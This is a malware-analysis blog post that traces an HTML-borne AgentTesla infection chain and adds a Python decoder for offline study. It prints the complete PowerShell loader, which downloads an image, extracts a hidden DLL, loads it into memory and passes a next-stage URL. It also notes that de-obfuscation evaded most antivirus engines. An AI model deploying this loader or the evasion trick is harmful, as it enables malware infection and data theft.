Opening HTML Files: A gateway to Malware
2023-11-15 02:10:26 Author: infosecwriteups.com

The file hash had already been submitted and is flagged as malicious by the major AV/EDR engines; even Windows Defender catches it and removes the file from disk. However, after de-obfuscating the VBScript inside the HTML file I was able to get past Defender, and when I uploaded that modified copy to VirusTotal only 3 engines detected it as malicious, which suggests the signatures were matching the obfuscated wrapper rather than the behaviour underneath it.

Modified copy of the malware uploaded to VirusTotal.

Reviewing the HTML file manually in a text editor, we see the obfuscated VBScript. Analysing it, I noticed a function that takes a parameter named "command"; at the end of that function an object is created and the command is executed through it.

Obfuscated VBScript
Suspicious function

De-obfuscating the VBScript further, we find an obfuscated PowerShell command. This is the string handed to powershell.exe for execution, and it forms the second layer of obfuscation.

Second-layer obfuscated code

Decoding this PowerShell gives the script below. It downloads an image from imageupload.io, extracts a base64 string embedded in the image (the image is a real picture; the payload is simply appended after the image data, between two marker strings, so the file still renders), decodes it and loads the result directly into memory with [System.Reflection.Assembly]::Load, so the DLL is never written to disk as a file.

# Stage 3: fetch the carrier image and carve the payload appended to it
$imageUrl = 'https://imageupload.io/ib/ekWgHWjP3arvUq7_1698166097.jpg';
$webClient = New-Object System.Net.WebClient;
$imageBytes = $webClient.DownloadData($imageUrl);
# The whole JPEG is decoded as text; this only works because the markers and the base64 are pure ASCII
$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);
$startFlag = '<<BASE64_START>>';
$endFlag = '<<BASE64_END>>';
$startIndex = $imageText.IndexOf($startFlag);
$endIndex = $imageText.IndexOf($endFlag);
# Leftover of a sanity check: a bare boolean expression with no if around it, so nothing branches on it
$startIndex -ge 0 -and $endIndex -gt $startIndex;
$startIndex += $startFlag.Length;
$base64Length = $endIndex - $startIndex;
$base64Command = $imageText.Substring($startIndex, $base64Length);
$commandBytes = [System.Convert]::FromBase64String($base64Command);
# Reflective load: the .NET assembly is mapped straight from the byte array, never from a file on disk
$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);
$type = $loadedAssembly.GetType('Fiber.Home');
# Entry point: the static method Fiber.Home.VAI; the first argument is the base64-encoded, reversed next-stage URL
$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LjQ2ZXNhYmVsaWZkZXRhZHB1ZGlvcmRkZW1tYWhvbS80NzEuNzMuNDUyLjU4MS8vOnB0dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))

I then wrote a simple PowerShell script to download the image file, extract the base64 data, decode it and write it out as a binary. Checking the PE headers shows the name of the DLL to be Fiber.dll.

PE header information, where the name of the DLL can be seen.

Note: this DLL has also been submitted before and is flagged as highly malicious. Defender detects and removes the file automatically, so for the analysis I had to add an exclusion.

Reviewing further, the final URL, which is passed base64-encoded and reversed as the first parameter to the method "VAI" exported by the DLL, is now down, so I stopped my analysis here. However, checking the URL I see it has been flagged by many and is associated with AgentTesla RAT operations.

URL associated with the AgentTesla malware
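To reproduce the two decoding steps offline (the payload carve described with the loader script above, and the reversed URL argument discussed just now), here is an added Python example. It is not the author's PowerShell carving script and not the malware's own code. The marker strings and the first VAI argument are taken from the loader exactly as printed above; the carrier JPEG and the "DLL" bytes are constructed stand-ins, so the PE check here only confirms the MZ/PE signatures and the COFF DLL flag rather than reading the export name the author saw for Fiber.dll.

```python
"""Offline reproduction of the loader's carving and argument decoding.

Added example. Only START_FLAG, END_FLAG and VAI_ARG come from the loader
script; the JPEG and PE bytes below are constructed for the demo.
"""
import base64
import struct
from typing import Optional

START_FLAG = b"<<BASE64_START>>"
END_FLAG = b"<<BASE64_END>>"
# First argument handed to Fiber.Home.VAI in the loader above
VAI_ARG = "dHh0LjQ2ZXNhYmVsaWZkZXRhZHB1ZGlvcmRkZW1tYWhvbS80NzEuNzMuNDUyLjU4MS8vOnB0dGg="

IMAGE_FILE_DLL = 0x2000          # COFF Characteristics bit
IMAGE_FILE_MACHINE_I386 = 0x14C


def carve_appended_base64(blob: bytes) -> Optional[bytes]:
    """Return the decoded payload hidden between the markers, or None.

    Searches the raw bytes instead of a UTF-8 decoded string: the loader's
    UTF8.GetString only works because both markers and base64 are ASCII,
    and replacement characters from the JPEG data can shift text offsets.
    """
    start = blob.find(START_FLAG)
    if start < 0:
        return None
    start += len(START_FLAG)
    end = blob.find(END_FLAG, start)
    if end < 0:
        return None
    return base64.b64decode(blob[start:end].strip(), validate=True)


def pe_summary(data: bytes) -> Optional[dict]:
    """Minimal PE header parse: MZ stub, e_lfanew, PE signature, COFF header."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    machine, nsections, _, _, _, _, characteristics = struct.unpack_from(
        "<HHIIIHH", data, e_lfanew + 4)
    return {"machine": hex(machine), "sections": nsections,
            "is_dll": bool(characteristics & IMAGE_FILE_DLL)}


def decode_reversed_arg(arg: str) -> str:
    """The VAI argument is base64 of the next-stage URL written backwards."""
    return base64.b64decode(arg).decode("ascii")[::-1]


def build_fake_pe_dll() -> bytes:
    """Constructed stand-in for Fiber.dll: DOS stub plus a COFF header
    flagged as an i386 DLL. Not loadable, just enough for pe_summary()."""
    dos = bytearray(b"MZ" + b"\0" * 0x3E)
    struct.pack_into("<I", dos, 0x3C, 0x40)       # e_lfanew -> PE signature
    coff = struct.pack("<HHIIIHH", IMAGE_FILE_MACHINE_I386, 0, 0, 0, 0, 0,
                       IMAGE_FILE_DLL | 0x0002)    # 0x0002 = EXECUTABLE_IMAGE
    return bytes(dos) + b"PE\0\0" + coff


def build_carrier_image(payload: bytes) -> bytes:
    """Constructed carrier: a minimal JFIF header and EOI marker, with the
    marker-wrapped base64 appended after the end of the picture, which is
    why the real image still renders normally."""
    jpeg = (b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
            + b"\xff\xd9")
    return jpeg + START_FLAG + base64.b64encode(payload) + END_FLAG


if __name__ == "__main__":
    image = build_carrier_image(build_fake_pe_dll())
    dll = carve_appended_base64(image)
    print(pe_summary(dll))
    print(decode_reversed_arg(VAI_ARG))
```

Running it against a real carrier is a matter of replacing the constructed image with the downloaded JPEG; if carve_appended_base64 returns None the sample is using different markers and the loader's own flag strings are the first thing to check. The argument decoder reverses the string after base64 decoding, which is the order the loader itself implies.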

At the time of writing this blog, the AgentTesla family was the most reported malware on MalwareBazaar.


Article source: https://infosecwriteups.com/opening-html-files-a-gateway-to-malware-5ae4cab864f8?source=rss----7b722bfd1b8d---4